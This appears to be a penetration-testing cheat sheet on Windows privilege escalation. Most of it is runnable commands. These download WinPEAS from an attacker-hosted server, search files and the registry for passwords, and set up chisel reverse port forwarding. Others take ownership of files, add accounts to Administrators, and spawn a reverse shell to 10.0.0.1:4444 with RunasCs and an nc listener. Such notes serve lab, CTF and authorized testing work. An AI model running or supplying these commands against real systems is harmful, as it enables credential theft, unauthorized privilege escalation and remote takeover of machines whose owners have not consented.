Windows Privilege Escalation
Last modified: 2023-08-24
Privilege Escalation (PrivEsc) in Windows is a process that get the Administrator credential and login.
WinPEAS scans the Local Privilege Escalation vulnerabilities on Windows machine automatically.
Start web server to allow the target machine to get the WinPEAS.
python3 -m http.server 8000
cd \Users\<user-name>\Desktop powershell Invoke-WebRequest -Uri http://<your-local-ip>:8000/winPEAS.bat -OutFile .\winPEAS.bat # or curl http://<your-local-ip>:8000/winPEAS.bat -o .\winPEAS.bat
LOLBAS provides misuses tools and executables already in the Windows system. So check the web page.
hostname systeminfo systeminfo | findstr "OS" ver # Current user whoami whoami /user whoami /groups whoami /priv whoami /all echo %username% # List users and groups net user net users net user USERNAME net group net localgroup # List users in specific group net localgroup "Remote Management Users" # Network ipconfig ipconfig /all route print arp -A # Firewall netsh firewall show state netsh firewall show config netsh advfirewall show allprofiles
After investigating the OS information, find the vulnerabilities of OS version.
- Right-click on the Windows icon.
- Click the “Run”.
- Type “recent” in the search form.
Using the Windows Management Instrumentation command-line (WMIC) mainly.
wmic service list wmic service list | findstr "Backup" # Get target process info wmic process get processid,parentprocessid,executablepath | find "<process-id>" # Get users SID wmic useraccount get name,sid # Launch the hidden executable hiding within ADS wmic process call create $(Resolve-Path .\file.exe:streamname) # Processes and services sc query state=all tasklist /svc # Query the configuration info for a specified service sc qc "Development Service"
- Open Internet Explorer, click on the star icon.
- Select History tab.
- Click on Kebab menu icon at the top-right and click History.
VSS coordinates the actions that are required to create a consistent a shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.
vssadmin vssadmin list shadows vssadmin list volumes
# /s: Searches the current directory and all subdirectories. # /i: Ignores the case of the characters. findstr /si password *.txt *.xml *.ini findstr /si password c:\Users\Administrator\*.txt findstr /si cred *.txt *.xml *.ini findstr /si cred c:\Users\Administrator\*.txt # /p: Skips files with non-printable characters. # /n: Prints the line number of each line that matches. findstr /spin "password" *.* findstr /spin "password" c:\Users\Administrator\* # ListList files # /a: Displays only the names of those directories and files. dir /a \Users\Administrator\Desktop # /s: Lists every oncurrece of the specified file name within the specified directory and all subdirectories. dir /s *pass* == *cred* == *vnc* == *.config* # /q: Displays the ownership information. dir /q \Users\Administrator\Desktop # Website folder dir c:\inetpub\ # SQL server dir c:\SQLServer\Logs type c:\SQLServer\Logs\ERRORLOG.BAK # Get contents of file more .\example.txt type .\example.txt # Registry subkey information # query: Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry # HKLM: The keyname of HKEY_LOCAL_MACHINE # /f: Specifies the data or pattern to search for. # /t: Specifies registry types to search. # /s: Specifies to query all subkeys and value names recursively. reg query HKLM /f password /t REG_SZ /s # Check Recycle.bin and SID Folder dir -Force \'$Recycle.Bin' # ManageEngine (this service has many vulnerabilities) dir -Force \'Program Files (x86)'\ManageEngine\
PS> Get-ChildItem -Path c:\\ -Filter "*.txt" -Recurse 2>$null # Directories PS> Get-ChildItem -Path c:\\ -Directory -Filter "Example" -Recurse 2>$null
Reference: Atomic Rea Team
We can collect the information about emails such as Outlook on the following directories.
C:\Users\<username>\Documents\Outlook Files C:\Users\<username>\AppData\Local\Microsoft\Outlook
If we found the listening ports, we need to port forwarding to access the port in local machine.
For example, assume the port 8000 is listening. We can access to the target port 8000 by accessing to
[http://localhost:8000](http://localhost:8000) in local by executing the following command.
# Remote (target) machine chisel.exe client 10.0.0.1:9999 R:8000:127.0.0.1:8000 # Local (attacker) machine chisel server --reverse -p 9999
Please refer to this page to check how to use Chisel for port forwarding.
We can find all local users in Computer Management utility. To open, enter "computer management" in search form at the bottom of the windows screen.
In Computer Management, click "Local Users and Groups".
- Click "Users".
- Double-click each user to get details e.g. "Member Of".
- Click "Groups".
- Double-click each group.
- Attempt to add new user in the group because we might be able to do that even if we are not an administrator.
- Right-click on the file.
- Select the Properties.
- Click the Security tab.
- Click “Advanced”.
- In the Permissions tab, click the “Add”.
- Click “Select a principal”.
- Enter the username in the text field.
- Click OK and Apply.
Also we can change permissions in CommandPrompt or PowerShell.
icacls 'C:\Path\to\file' /grant Users:F icacls 'C:\Path\to\file' /grant Everyone:F
# Change user's password net user USERNAME NEWPASSWORD # Add new user net user /add USERNAME PASSWORD # Add user to group net localgroup Administrators USERNAME /add net localgroup "Remote Managment Users" USERNAME /add # For WinRM net localgroup "Remote Desktop Users" USERNAME /add # For RDP # Delete users from specific group net localgroup "Remote Management Users" USERNAME /delete
If we could change the permission, connect to the target via WinRM or RDP.
# Check if the current user belongs to the Administrators group. net user USERNAME # Move to the directory containing the desired file cd \Users\Administrator\Desktop # Enable an administrator to recover access to a file. # /R: recursive operation # /F: specify the filename takeown /r /f *.* # Modify dictionary access control lists on specified files # /q: suppress success message # /c: continue the operation despite any file errors # /t: perform the operation on all specified files # /grant: grant specified user access rights icacls "example.txt" /q /c /t /grant Users:F
runas /user:<domain>\<username> cmd
If we cannot switch user due to such as reverse shell sessions, we can spawn another shell as another user by using RunasCS.
First, start a listener in local machine.
nc -lvnp 4444
Then execute the following command in target machine.
password with the credential of the user that we want to switch to.
RunasCs.exe username password cmd -r 10.0.0.1:4444
- Event Viewer
- Task Schedular
Tools that offer technical resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.
# Autoruns # It shows what programs are configured to run during system bootup or login. autoruns.exe # Process Explorer # A freeware task manager and system monitor. procexp.exe procexp64.exe # Process Monitor # It monitors and displays in real-time all file system activity. procmon.exe procmon64.exe # Strings # It is same as the Linux “strings” command. strings.exe example.exe | findstr "sometext" strings64.exe example.exe | findstr "sometext"